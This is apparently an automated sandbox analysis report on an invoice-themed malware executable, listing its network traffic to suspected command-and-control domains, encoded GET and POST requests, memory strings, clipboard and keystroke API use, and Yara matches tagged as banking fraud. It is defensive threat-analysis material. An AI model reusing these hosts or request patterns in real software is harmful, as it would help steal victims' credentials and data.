                Source: global trafficHTTP traffic detected: GET /8u3q/?UTJ0bhC=cm4ubz77/lIwMrhkdRh+pZgL/Bl5XR/XxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJch/nk290kcPG1JSPbhB/GQRlqu+N9s0n8p9+2HNGTNszmQ==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.astrext.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f83s/?Pt=fDlHoNWP0RBd&UTJ0bhC=VieK6f8ncaDfGPivzEEx/UZGk95Gg2UmvQp6RJCzQOx2HiGD45aR4i1hBpXETM6WRWeDEM4UlZawI5DKshaxB7d7bPT0ms8iN9yo/alCEGhGDXP2xLsxmillvf5/o1Iesw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newhopetoday.appConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnm5/?UTJ0bhC=ti6/QOgt3F3Nl8C8p5prtjMaW6Y6IMW9lnWD5iRmif1oLulHgQhjY9iWeVbvuaIrm8dL1NajAOuvhk5PRRHWg3CbVnS8VxpDrxjuQQLZCEWAlJrEzJ1sdVkNA6M29CxpkA==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.binacamasala.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dlion.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bioart.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.06753.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gucciqueen.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.premium303max.restConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.regents.health
                Source: global trafficDNS traffic detected: DNS query: www.73613.shop
                Source: global trafficDNS traffic detected: DNS query: www.eco-tops.website
                Source: global trafficDNS traffic detected: DNS query: www.astrext.info
                Source: global trafficDNS traffic detected: DNS query: www.newhopetoday.app
                Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
                Source: global trafficDNS traffic detected: DNS query: www.dlion.net
                Source: global trafficDNS traffic detected: DNS query: www.bioart.buzz
                Source: global trafficDNS traffic detected: DNS query: www.06753.photo
                Source: global trafficDNS traffic detected: DNS query: www.gucciqueen.shop
                Source: global trafficDNS traffic detected: DNS query: www.premium303max.rest
                Source: global trafficDNS traffic detected: DNS query: www.mnpl.online
                Source: global trafficDNS traffic detected: DNS query: www.locuramagica.online
                Source: unknownHTTP traffic detected: POST /tizt/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.73613.shopContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 208Origin: http://www.73613.shopReferer: http://www.73613.shop/tizt/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Ascii: UTJ0bhC=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKstmdJa9rfNvVfz0Zd4Fp/rHZLci4EsRRakEsqs=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:07 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:10 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:13 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 10 Dec 2024 15:24:16 GMTTransfer-Encoding: chunkedConnection: closeX-Powered-By: 3.2.1Access-Control-Allow-Origin: *Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONSData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 15:24:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:31 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:34 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 10 Dec 2024 15:24:37 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1271 Connection: close Date: Tue, 10 Dec 2024 15:24:39 GMT Server: Apache X-Frame-Options: deny
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 679f2543-3481-4a3d-a4e3-5e9e2ad5c117 x-runtime: 0.029777 content-length: 17134 connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: b48f66f8-e84b-437c-80bf-e31ef0255395 x-runtime: 0.021908 content-length: 17154 connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 5325af3b-84a0-482b-ab46-c4e2842ab007 x-runtime: 0.021576 content-length: 18170 connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 15:23:20 GMT Server: Apache/2.4.10 (Debian) Content-Length: 275 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.dlion.net Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty/1.19.3.1 Date: Tue, 10 Dec 2024 15:25:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Cache: MISS from kangle web server Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty/1.19.3.1 Date: Tue, 10 Dec 2024 15:25:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 982 Connection: close X-Cache: MISS from kangle web server
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 15:26:32 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 15:27:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 10 Dec 2024 15:27:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.00000000053F8000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000006888000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4507703675.0000000006522000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.locuramagica.online
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4507703675.0000000006522000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.locuramagica.online/rls3/
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004F42000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000063D2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://error.kangleweb.net/?code=404&vh=594445
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://help.hover.com/home?source=parked
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/o
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xwizard.exe, 00000005.00000003.2528778267.000000000325F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xwizard.exe, 00000005.00000002.4501845196.0000000003233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xwizard.exe, 00000005.00000003.2527902409.000000000813B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://twitter.com/hover
                Source: xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/about?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domains/results
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/email?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/privacy?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tools?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tos?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/transfer_in?source=parked
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0046C5D0 OpenClipboard, IsClipboardFormatAvailable, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, 0_2_0046C5D0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00459FFF OpenClipboard, EmptyClipboard, CloseClipboard, GlobalAlloc, GlobalLock, _wcscpy, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, 0_2_00459FFF
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00456354 GetCursorPos, ScreenToClient, GetAsyncKeyState, GetAsyncKeyState, GetAsyncKeyState, GetWindowLongW, 0_2_00456354
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0047C08E SendMessageW, DefDlgProcW, GetKeyState, GetKeyState, GetKeyState, SendMessageW, GetKeyState, GetWindowLongW, SendMessageW, SendMessageW, SendMessageW, _wcsncpy, SendMessageW, SendMessageW, SendMessageW, InvalidateRect, SendMessageW, ImageList_SetDragCursorImage, ImageList_BeginDrag, SetCapture, ClientToScreen, ImageList_DragEnter, ReleaseCapture, GetCursorPos, ScreenToClient, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, GetCursorPos, ScreenToClient, GetParent, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, GetWindowLongW, 0_2_0047C08E

                E-Banking Fraud

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
